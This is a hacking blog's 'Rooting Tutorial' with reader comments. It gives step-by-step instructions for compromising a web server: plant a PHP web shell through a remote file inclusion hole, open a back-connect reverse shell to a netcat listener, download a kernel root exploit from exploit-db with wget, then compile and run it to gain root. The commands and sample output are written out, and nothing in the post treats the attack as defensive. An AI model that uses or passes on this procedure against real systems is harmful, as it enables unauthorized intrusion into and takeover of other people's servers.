Rooting Tutorial | Ksecurity-team

Subscribe & Don,t Miss A Free Hacking Course| Receive Daily Updates

Enter your email address:

Delivered by FeedBurner

Rooting Tutorial



Tutorial made by Darlixus.

Dedicated to Zero Burn & Team-1nj3ct.

What we need?
-RFI Vulnerable Script
-PHP Shell
-Netcat
-Brains

First of all, we need to get a shell on a site.Maybe i'll write a RFI Tutorial latter, for now just look it up on google.

For this tutorial i will be using MulCi Shell.

So, once you have it on a site, go to the 'Backdoor Host' tab and forward a port.

Now, go to the 'Back Connect' tab and insert the following settings:

[Image: 24l1xeb.png]

1- Your IP Address.
2-The port you forwarded.

Now, go on CMD and type in:cd 'Path To Your Netcat.exe' and then you need to make netcat listen to the port you forwarded.To do this, type:nc -l -n -v -p port

It looked like this for me:

Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.

C:\FeAR>cd C:\

C:\>cd WINDOWS

C:\WINDOWS>nc -l -n -v -p 4444
listening on [any] 4444 ...

Now, when you have netcat listening to the port you forwarded, click 'Connect'.

When your connected, type 'whoami'.You shouldnt have root.

Now, to find an exploit to root the box, you need to know whats the kernel version.To do this, just type 'uname -a'.

It should look something like this:

Code:
Linux linux1.dmehosting.com 2.6.17-92.1.10.el5PAE #1 SMP Tue Aug 5 08:14:05 EDT 2008 i686

Now, we go on exploit-db.com and we will look for '2.6.17'.

Code:
hhttp://www.exploit-db.com/exploits/5092/

Now, we type 'wget http://www.exploit-db.com/exploits/5092/ on the netcat window.

Code:
wget http://xpl_url.com

So the exploit works, you must compile it in the server(gcc) and execute it via exploit(-o).

To do this we type 'gcc 5092 -o exploit'.

Code:
gcc 5092 -o exploit

5092- After the url path.http://www.site.com/5092.
exploit- Output name.


Now you can execute your exploit by typing './exploit'

Wait for the exploit to finish running and type root again.

It should output in something like this:

Code:
uid=0(root) gid=0(root) groups=500(apache)

This means you have successfully rooted the box :).

There are more ways to do this, this is the way I usually do it.

I took like, 1h 30m to write this so please, if you are going to leech this atleast give credit.

Tutorial made by Darlixus.Gree7z to:Team-1nj3ct.




Share your views...

5 Respones to "Rooting Tutorial"

Anonymous said...

sir this is very nice tutorial but i can not under stand it fully.please explain it that where to get tools and what is RFI please give a tutorial on it as early as possible.
best regards,
your, paskistani ,brother


July 3, 2010 at 9:51 PM
KBC OFFICIAL said...

first of all just tell me do u know sql injection?

Anonymous said...

which tools are used in rooting a webserver,
and what is the advantage if shell is already on the server,
please tell me the tools used in this tutorial
like apache 2.2.9 etc


July 6, 2010 at 11:17 AM
Anonymous said...

u can find local root exploits on www.exploit.db.com


July 6, 2010 at 1:15 PM
Anonymous said...

i need gcc compiler link


September 8, 2010 at 11:44 PM

Post a Comment

 

Members

Join Us At Facebook

Enter your email address:

Delivered by FeedBurner

© 2011 Ksecurity-team All Rights Reserved Hackguide4u Theme by Adnan Anjum Learn Hacking Online hackguide4u.blogspot.com